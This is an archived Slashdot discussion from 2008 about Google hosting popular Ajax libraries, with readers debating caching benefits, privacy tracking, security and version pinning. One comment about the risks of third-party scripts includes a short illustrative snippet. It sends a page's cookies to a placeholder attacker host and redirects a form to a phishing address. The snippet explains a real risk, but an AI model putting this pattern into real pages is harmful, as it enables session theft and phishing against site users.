Google To Host Ajax Libraries

ruphus13 writes "So, hosting and managing a ton of Ajax libraries, even when working with MooTools, Dojo, or Scriptaculous, can be quite cumbersome, especially as they get updated along with your code. In addition, many sites now use these libraries, and the end user has to download the same library for each site. Google will now provide hosted versions of these libraries, so developers can simply reference Google's hosted copy. From the article, 'The thing is, what if multiple sites are using Prototype 1.6? Because browsers cache files according to their URL, there is no way for your browser to realize that it is downloading the same file multiple times. And thus, if you visit 30 sites that use Prototype, then your browser will download prototype.js 30 times. Today, Google announced a partial solution to this problem that seems obvious in retrospect: Google is now offering the "Google Ajax Libraries API," which allows sites to download five well-known Ajax libraries (Dojo, Prototype, Scriptaculous, Mootools, and jQuery) from Google. This will only work if many sites decide to use Google's copies of the JavaScript libraries; if only one site does so, then there will be no real speed improvement. There is, of course, something of a privacy violation here, in that Google will now be able to keep track of which users are entering various non-Google Web pages.' Will users adopt this, or is it easy enough to simply host an additional file?"
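For readers who haven't seen the announcement, using a hosted copy boils down to pointing a script tag at Google's servers instead of your own. A minimal sketch, assuming the ajax.googleapis.com URL pattern and the Prototype version shown here (check Google's documentation for the exact paths and available versions):

    <!-- before: serving your own copy -->
    <script type="text/javascript" src="/js/prototype.js"></script>

    <!-- after: referencing Google's hosted, version-pinned copy -->
    <!-- (URL pattern and version number are illustrative) -->
    <script type="text/javascript"
            src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.0.2/prototype.js"></script>
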
This discussion has been archived. No new comments can be posted.

  • by nguy ( 1207026 ) on Wednesday May 28, 2008 @10:26AM (#23570327)
    Compared to all the other crappy media that sites tend to have these days, centralizing distribution of a bunch of Javascript libraries makes almost no sense. I doubt it would even appreciably reduce your bandwidth costs.
  • by GigaHurtsMyRobot ( 1143329 ) on Wednesday May 28, 2008 @10:28AM (#23570349) Journal

    If you want to improve download speed, how about removing the 70% of the code that just encodes/decodes XML and using simple, efficient delimiters instead? I was a fan of Xajax, but I had to re-write it from scratch... XML is too verbose when you control both endpoints.

    It is not a problem to host an additional file, and this only gives Google more information than they need... absolutely no good reason for this.

  • Well doh (Score:4, Insightful)

    by Roadmaster ( 96317 ) on Wednesday May 28, 2008 @10:28AM (#23570351) Homepage Journal

    Will users adopt this, or is it easy enough to simply host an additional file?
    Well duh, it's dead easy for me to just host another file; so easy, in fact, that web frameworks usually do it for you by default. But that's missing the point: for the end user it would be better, faster, and more efficient if I went to the trouble of using Google's hosted version instead of my local copy. That would indeed be more work for me, but it benefits the end user.
  • by CastrTroy ( 595695 ) on Wednesday May 28, 2008 @10:31AM (#23570391)
    This is only a partial solution. The real solution is for sites using AJAX to get away from this habit of requiring hundreds of kilobytes of script just to visit the home page. Couldn't you design a modular AJAX system that would bring in functions as they are needed? That way, someone visiting just a couple of pages wouldn't have to download the entire library. Have each function in its own file, and then when an AJAX call is made, make it smart enough to figure out which functions need to be downloaded to run the resulting JavaScript. The problem with Google hosting everything is that everybody has to use the versions Google has posted, and you can't make any custom modifications to the components. I think what Google is doing would help, but the solution is far from optimal.
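
    A rough idea of what "bring in functions as they are needed" could look like, sketched here with a hypothetical loadScript helper, element id, and module names (a real loader would also need to handle IE's onreadystatechange and failure cases):

        // Sketch: fetch a feature's script only when it is first needed.
        var loadedScripts = {};

        function loadScript(url, callback) {
          if (loadedScripts[url]) {       // already fetched: just run the callback
            callback();
            return;
          }
          var script = document.createElement('script');
          script.src = url;
          script.onload = function () {   // IE would need onreadystatechange instead
            loadedScripts[url] = true;
            callback();
          };
          document.getElementsByTagName('head')[0].appendChild(script);
        }

        // Usage: pull in a (hypothetical) autocomplete module only when the
        // search box is focused, instead of shipping it with every page view.
        document.getElementById('search').onfocus = function () {
          loadScript('/js/autocomplete.js', function () {
            initAutocomplete();           // assumed to be defined by autocomplete.js
          });
        };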
  • Nifty (Score:1, Insightful)

    by Anonymous Coward on Wednesday May 28, 2008 @10:32AM (#23570407)
    Now if only this could be done with GWT. Rather than building on a base library, GWT vomits a slew of files, all with hashed names. Since no two compiles are the same, you end up with an ever-growing set of JS and HTML files sitting in the component directory. This is particularly annoying because all these files interact poorly with version control systems. (Even one as advanced as, say, Mercurial.)

    At the very least, a standard Ant plugin so that GWT output could be generated at build time rather than dev time would do wonders for the project.
  • I won't adopt (Score:5, Insightful)

    by corporal_clegg ( 547755 ) on Wednesday May 28, 2008 @10:37AM (#23570461) Homepage
    As a developer, the privacy of my users is of paramount importance to me. I have grown increasingly concerned with Google's apparently incessant need to pry into my searches and my browsing habits. Where once I was a major Google supporter, I have trimmed my use of their services back from email and toolbars to simple searches, and now I won't use them at all if I am searching for anything that may be misconstrued at some point by guys in dark suits with plastic ID badges. The last thing I am going to do as a developer is force my users into a situation where they can feed the Google Logging Engine.
  • Re:Couldn't be... (Score:5, Insightful)

    by Jellybob ( 597204 ) on Wednesday May 28, 2008 @10:42AM (#23570545) Journal

    Also, those hosted js files would be prime targets for people who want to spread their malware, so I sure hope they're safe...

    Yes, you've gotta be careful with those incompetent sysadmins that Google are hiring.

    After all, they're constantly getting the servers hacked.
  • Comment removed (Score:3, Insightful)

    by account_deleted ( 4530225 ) on Wednesday May 28, 2008 @10:43AM (#23570557)
    Comment removed based on user account deletion
  • by Bobb Sledd ( 307434 ) on Wednesday May 28, 2008 @10:46AM (#23570603) Homepage
    Yikes...

    Maybe it is possible to get TOO modular. Several problems with that:

    1. With many little files come many little requests. If the web server is not properly set up, the overhead these individual requests cause really slows the transmission of the page. Usually, it's faster to have everything in one big file than to have the same number of kilobytes spread across many smaller files.

    2. From a development point of view, I use several JS bits that require this or that library. I don't know why or which functions they need, and I really don't care; I have my own stuff to worry about. I don't want to go digging through someone else's code (that already works) to figure out which functions it doesn't need.

    3. If I do custom work where file size is a major factor or if I only use one function from the library, I guess then I'll just modify as I see fit and host on my own site.

    I think what Google is doing is great, but I can't really use it for my sites (they're all secure). So unless I want that little warning message to come up, I won't be using it.
  • by maxume ( 22995 ) on Wednesday May 28, 2008 @10:51AM (#23570661)
    In theory, cache hits wouldn't give Google any information at all. So when the API works the way it is supposed to, it doesn't reveal anything.

    Someone could even put up a site called googlenoise.com or whatever, with the sole purpose of loading the useful versions of the library into the cache from the same place.
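
    The "googlenoise" idea is essentially a page whose only job is to warm the browser cache. A sketch, with illustrative library versions and the ajax.googleapis.com URLs assumed from Google's announcement:

        <!-- cache-priming page: load the popular libraries once, so that later
             visits to sites referencing the same URLs are pure cache hits and
             generate no further requests to Google -->
        <html>
          <head>
            <script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.0.2/prototype.js"></script>
            <script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/scriptaculous.js"></script>
            <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
          </head>
          <body>Libraries cached.</body>
        </html>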
  • by ClayJar ( 126217 ) on Wednesday May 28, 2008 @10:52AM (#23570677) Homepage

    Couldn't you design a modular AJAX system that would bring in functions as they are needed? That way, someone visiting just a couple of pages wouldn't have to download the entire library. Have each function in its own file, and then when an AJAX call is made, make it smart enough to figure out which functions need to be downloaded to run the resulting JavaScript.
    Actually, the trend is in the opposite direction. By including everything in one file, you can greatly reduce the number of HTTP transactions. Eliminating the significant overhead there can improve "speed" tremendously.

    Additionally, if you're using compression, it is likely that one large file will compress more effectively than a collection of smaller files. (You *are* using compression, aren't you?)
  • by Daengbo ( 523424 ) <daengbo&gmail,com> on Wednesday May 28, 2008 @10:54AM (#23570707) Homepage Journal
    You have to consider that Google is a for-profit business and hosting these files represents a bandwidth cost and a maintenance cost for them.

    The bandwidth cost should be small since Google uses these libraries already and the whole idea is to improve browser caching. The maintenance cost of hosting static content shouldn't be that high, either. I mean, really.

    Since the labor, hardware, and bandwidth costs all seem to be low, Google wouldn't be under pressure to make the investment pay. Google hosts lots of things that don't benefit them directly and from which they gain no real advantage except image. Despite being a data-mining machine, Google does a lot of truly altruistic stuff.
  • by socsoc ( 1116769 ) on Wednesday May 28, 2008 @11:12AM (#23570955)
    Google Analytics is invaluable for small business. AWStats and others cannot compete on ease of use and accuracy. By blocking the domain in your hosts file, you aren't sticking it to Google, you are hurting the Web sites that you visit. I'm employed by a small newspaper and we use Google Analytics in order to see where our readers are going and how we can improve the experience for you. Google already has this information through AdSense, or do you have that blocked too? Again you're hurting small business.

    You may refuse to give them your data, but if I had the ability, Apache would refuse to give you my data until you eased off on the attitude.
  • by causality ( 777677 ) on Wednesday May 28, 2008 @11:14AM (#23570979)

    Since the labor, hardware, and bandwidth costs all seem to be low, Google wouldn't be under pressure to make the investment pay. Google hosts lots of things that don't benefit them directly and from which they gain no real advantage except image. Despite being a data-mining machine, Google does a lot of truly altruistic stuff.

    Low cost != no cost. While you definitely have a point about their corporate image, I can't help but say that recognizing a company as a data-mining machine, as you have accurately done, and then assuming (and that's what this is, an assumption) an altruistic motive when they take an action with a strong data-mining component is, well, a bit naive. I'm not saying that altruism couldn't be the case and that profit must be the sole explanation (that would also be an assumption); what I am saying is that, given the lack of hard evidence, one of those is a lot more likely.
  • by telbij ( 465356 ) on Wednesday May 28, 2008 @11:16AM (#23571003)
    Is it really necessary to be so dramatic?

    When you visit a website, the site owner is well within their rights to record that visit. To assert otherwise is an extremist view that needs popular and legislative buy-in before it can in any way be validated. The negotiation is between Google and website owners.

    If you want to think of your HTTP requests as your data, then you'd probably best get off the Internet entirely. No one is ever going to pay you for it.

    Also:

    To the folks who say "well how else are they supposed to make money"


    Red herring. No one says that. No one even thinks about that. Frankly there are far more important privacy concerns out there than the collection of HTTP data.
  • by Anonymous Coward on Wednesday May 28, 2008 @11:23AM (#23571079)
    And your company is who? Thanks for the useful info on how I can use your company's service...
  • by Rich ( 9681 ) on Wednesday May 28, 2008 @11:34AM (#23571227) Homepage
    Well, one effect of this would be to allow Google to execute scripts in the security context of any site using their copy of the code. The same issue occurs for urchin.js, etc. If your site needs to comply with regulations like PCI DSS, you shouldn't be doing this, as it means Google has access to your cookies, can change your content, and so on.

    For many common sites that aren't processing sensitive information, however, sharing this code is probably a very good idea. Even better would be if Google provided a signed version of the code, so that you could verify it hasn't been changed.
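
    To make the security-context point concrete: an included script runs with the full privileges of the including page, so a tampered copy could do something like the following (hostile snippet shown purely for illustration, with a placeholder evil.example host):

        // Anything appended to a hosted library runs as if it were your own code.
        // It can read the page's cookies (unless they are HttpOnly)...
        var stolen = document.cookie;
        new Image().src = 'http://evil.example/collect?c=' + encodeURIComponent(stolen);

        // ...and it can rewrite your content, e.g. redirecting a form.
        if (document.forms.length > 0) {
          document.forms[0].action = 'http://evil.example/phish';
        }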
  • by Anonymous Coward on Wednesday May 28, 2008 @11:58AM (#23571615)

    When you visit a website, the site owner is well within their rights to record that visit.


    Yes.

    To assert otherwise is an extremist view that needs popular and legislative buy-in before it can in any way be validated.

    Strawman. The grandparent made no such assertion.

    While technically true, your strawman is false in spirit. The site owner must post a privacy policy in order to do anything with that data.

    The negotiation is between Google and website owners.

    False. You are downloading from Google's servers directly regardless of who referred you, and are therefore subject to Google's privacy policies; Google is not an uninvolved third party.
  • by richardtallent ( 309050 ) on Wednesday May 28, 2008 @12:01PM (#23571675) Homepage
    Oh no! If Google decides they don't want to spend the $10/year this will cost them anymore, I might have to change a header and footer script! Or *gasp* use a search-and-replace to fix the URLs!

    I'm *so* scared.

    Google is supporting web apps and offering to host the nasty boring bits that need strong caching. How very evil of them.

    And if Google is hacked, we're ALL screwed a hundred different ways. The average web developer *using* these libraries is more likely to have a vulnerable server than Google.
  • Dependency hell? (Score:4, Insightful)

    by jmason ( 16123 ) on Wednesday May 28, 2008 @12:01PM (#23571677) Homepage
    One site covering this [ajaxian.com] noted plans to 'stay up to date with the most recent bug fixes' of the hosted libraries -- this sounds like blindly upgrading the hosted libraries to new versions, which is a very bad idea.

    As a commenter there noted, it's a much better idea to use version-specific URIs, allowing users to choose the versions they wish to use -- otherwise version mismatches will occur between user apps and the Google-hosted libs, creating bugs and the classic 'dependency hell' that would be familiar to anyone who remembers the days of 'DLL hell'.
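
    The version-pinning point in practice, assuming the URL layout and google.load() behaviour described in the announcement (exact version strings are illustrative; the two loader calls show alternatives side by side):

        // Pinned to an exact release via a hard-coded URL: behaviour only
        // changes when you change the URL yourself.
        //   <script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.0.2/prototype.js"></script>

        // Via the loader, a partial version may silently resolve to the newest
        // matching release -- which is exactly the dependency-hell risk above.
        google.load("prototype", "1.6.0.2");   // exact version: predictable
        google.load("prototype", "1.6");       // floats to the latest 1.6.x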
  • Re:Couldn't be... (Score:3, Insightful)

    by Anonymous Coward on Wednesday May 28, 2008 @12:15PM (#23571913)
    Single-point-of-failure, DNS-cache-poisoning, host-file-redirects, etc. etc.

    You are not thinking this through!
  • by JavaRob ( 28971 ) on Wednesday May 28, 2008 @01:35PM (#23573171) Homepage Journal

    but now you also have the traffic pattern data for any of those sites that didn't use google analytics already, that's definitely valuable.
    No, they don't. Look again at how caching works. The first time a given browser hits a site that uses Prototype, for example, it'll pull the JS from Google (so Google sees that single site). The browser then hits 20 other sites that also use Prototype... and Google has no clue, because the JS is already cached.

    In fact, the cache headers specify that the JS libs don't expire for A YEAR, so Google will only see the first site you visit with X library Y version in an entire year.

    Is this information really that valuable?

    Mind you, this assumes you're hard-coding the google-hosted URLs to the JS libs, instead of using http://www.google.com/jsapi [google.com] -- but that's a perfectly valid and supported approach.

    If you use their tools to wildcard the library version, etc. etc. then they get a ping each time that JSAPI script is loaded (again, no huge amount of info for them, but still you can decide whether you want the extra functionality or not).
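
    For reference, the loader route mentioned above looks roughly like this; the google.load() and google.setOnLoadCallback() calls follow Google's published examples, with an illustrative version string:

        <script type="text/javascript" src="http://www.google.com/jsapi"></script>
        <script type="text/javascript">
          // Loading jsapi is the per-page request Google sees; the library it
          // pulls in can still be served straight from the browser cache.
          google.load("jquery", "1.2.6");
          google.setOnLoadCallback(function () {
            // runs once the requested library is available
            jQuery("p").addClass("loaded");
          });
        </script>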
  • by Anonymous Coward on Wednesday May 28, 2008 @01:39PM (#23573245)

    What's the purpose of Privacy Policy then?

    I certainly hope you're not talking about P3P [w3.org] because that extra header means nothing in the real world. As for the typical "Read our privacy policy" links which almost always lead to legalese, there have been enough sites changing privacy policy as they see fit without even bothering about notifying their users.

    Privacy policies are the saddest joke on the internet at the expense of anyone who's naive enough to believe them. Only a few high-profile sites will bother obeying them out of fear of litigation, and I wouldn't be surprised if your precious personal data gets stolen by an employee looking for a quick buck.

    As for its purpose: it reassures users that their personal data is safe with the company, while they carefully enter their personal information which is then usually POST'ed over plain old HTTP.

  • by richardtallent ( 309050 ) on Wednesday May 28, 2008 @01:45PM (#23573361) Homepage
    Do you *honestly* think that Google is going to modify the code for Prototype and slap some AdSense/Analytics goodies in there?

    The library developers would have their hide if they attempted such a thing!

    And I'm NOT wrong about cookies. Your site's cookies are not sent in the HTTP request to Google; they would only be accessible via JavaScript. And again, without Google modifying the source code of these libraries to be malicious, they wouldn't be privy to those cookies.

    Not that cookies store anything useful these days... almost everyone with serious server-side code uses server-side persisted sessions, so the only cookie is the session ID.
  • by caerwyn ( 38056 ) on Wednesday May 28, 2008 @01:58PM (#23573561)
    I'll take the benefits of Google supporting open source over "GSoC is evil" paranoia.

    If Google suddenly decides to stop hosting these, or touches them in some fashion, it's going to get discovered and fixed in well under 24 hours. Google hosting a file like this means that there are going to be a *lot* of eyes on the file.

    Google is, as it currently stands, far from "dangerous to the health of the web". Outside of using their webmail fairly heavily, I could avoid using Google quite easily, as could any other web user. Many websites are more dependent on them because Google is their source of income, but the fact that Google has effectively created a niche for small websites to live in can hardly be viewed as a negative.
  • by joelwyland ( 984685 ) on Wednesday May 28, 2008 @02:10PM (#23573723)

    the extra DNS queries necessary to download the file from a third-party server _reduce_ the responsiveness, often severely.
    Yeah, who is this google.com that I have to download this JS from? I've never been there before and that DNS lookup is really going to hurt.
  • Re:Couldn't be... (Score:2, Insightful)

    by joelwyland ( 984685 ) on Wednesday May 28, 2008 @02:25PM (#23573953)
    No one said they were hackerproof. However, how often do you hear about them getting hacked? They put a significant amount of energy into security.
  • by robo_mojo ( 997193 ) on Wednesday May 28, 2008 @02:26PM (#23573967)

    When you visit a website, the site owner is well within their rights to record that visit.
    Yup. I have no way to stop them, after all.

    The negotiation is between Google and website owners.
    Nope. If the website owner wanted to transmit information to Google, he could do so by having his server contact Google, or by dumping his logs to Google.

    Instead, if the website owner sends code to my browser that gives information to Google, I am within my rights to refuse to run it.

    Alternatively, the website owner in question could host his own data-analysis tools on his domain. There is plenty of free software for this (just as for most of the other services Google offers).
  • by Anonymous Coward on Wednesday May 28, 2008 @02:31PM (#23574035)

    If Google decides they don't want to spend the $10/year this will cost them anymore, I might have to change a header and footer script! Or *gasp* use a search-and-replace to fix the URLs!

    OK, hypothetical situation it is. Google takes the JavaScript offline. All of your customers' websites break, and some of them are medium- to high-profile web businesses. For the next two or three hours, they aren't receiving any orders. Their potential customers think, "Oh well, this site is broken, I'll just buy it from the competitor whose website seems to work."

    Three hours have passed, and your customers suddenly realize there's something wrong with their websites. They all call you within a span of 30 minutes. It takes you half an hour to find the problem and a couple of hours to fix all the sites. The business day is over.

    Some of your customers are happy you fixed their websites, but most will be angry at you because you trusted a third-party site with their business and they've lost potential revenue because of it. You've lost time, cost customers money, and potentially lost future business with those customers.

    I'm *so* scared.

    And yet you haven't even thought of SLAs and lawyers yet.

    Google is supporting web apps and offering to host the nasty boring bits that need strong caching. How very evil of them.

    Evil? No, not really. They've gotten publicity, some statistics, and a whole lot of people who are now depending on them, while they've got a nice disclaimer somewhere waiving most responsibility.

  • by vux984 ( 928602 ) on Wednesday May 28, 2008 @02:35PM (#23574089)
    Well that's just the dilemma. I use Google Analytics on all my sites, and sort of use the information to see what keywords are effective and most common. I don't then turn around and use that information to focus my content on those areas like any smart person would, but I don't really care if someone stumbles across my blog either (much more interesting are HeatMaps, not that I use that information in a meaningful way either).

    The real bullshit is that you used to be able to BUY Urchin fairly reasonably, host it on your own server, and get nearly the same reports and analytics, without having to give up your data and let Google track all your visitors from site to site.

    Someone needs to reverse engineer Analytics and make an open source version of it... wish I had the time. And sadly, the only people who'd ever use it are those concerned about the ramifications of feeding Google data... which is surprisingly few. If it were Microsoft doing this, people would be up in arms... when will people wake up and realize that Google is the new Microsoft? They aren't the underdog fighting the 800 lb gorilla; they are the 800 lb gorilla. But instead of bending people over with embrace-and-extend and rapacious licensing, they get you insidiously with an endless stream of "free product"... and all it costs you is a little data... and there's no harm in a little anonymous data... ...until it reaches a critical mass and suddenly it's not a little data anymore, nor is it anonymous; it all fits together to give a more complete composite picture of you than you EVER would have agreed to...

    Google is a death by a thousand tiny cuts.
  • by Anonymous Coward on Wednesday May 28, 2008 @02:35PM (#23574101)

    a) The goal is to have JavaScript files cached regularly, so as you go to other sites the browser will read the library from the cache and never have to hit Google!

    Fine, except what expiry are you going to put on it? How often will the ETag change? Browsers check for changed files, sending the google.com cookie with that request, and lo, you get our SID again.

  • by Anonymous Coward on Wednesday May 28, 2008 @03:05PM (#23574533)
    You're going to risk your site not working when someone blocks third-party JavaScript? Just to shave a few kilobytes of script load time off your site?
  • Re:Umm, no (Score:3, Insightful)

    by Just Some Guy ( 3352 ) <kirk+slashdot@strauser.com> on Wednesday May 28, 2008 @06:19PM (#23577679) Homepage Journal

    Something that may be affecting the differing results you two are seeing is that the call to check if a file has been modified is browser and user settings dependent.

    In fairness to AC, he may also be connecting to some ancient or broken server that doesn't support the "Cache-Control: max-age" or "Expires:" headers. If that's the case, or if he's running a noncompliant browser that improperly handles those, then it's possible that he's making a lot more requests than necessary.

    Either way, it's still a problem between his browser and that server, and not a problem with HTTP in general.
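
    For anyone unfamiliar with the headers being discussed, a far-future cache lifetime plus a cheap revalidation looks roughly like this (values are illustrative, not captured from Google's servers):

        GET /ajax/libs/prototype/1.6.0.2/prototype.js HTTP/1.1
        Host: ajax.googleapis.com

        HTTP/1.1 200 OK
        Cache-Control: public, max-age=31536000
        Expires: Thu, 28 May 2009 10:26:00 GMT
        Last-Modified: Wed, 21 May 2008 00:00:00 GMT

        (a compliant browser now serves the file from cache for a year; if it
        revalidates anyway, an unchanged file costs only a 304)

        GET /ajax/libs/prototype/1.6.0.2/prototype.js HTTP/1.1
        Host: ajax.googleapis.com
        If-Modified-Since: Wed, 21 May 2008 00:00:00 GMT

        HTTP/1.1 304 Not Modified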
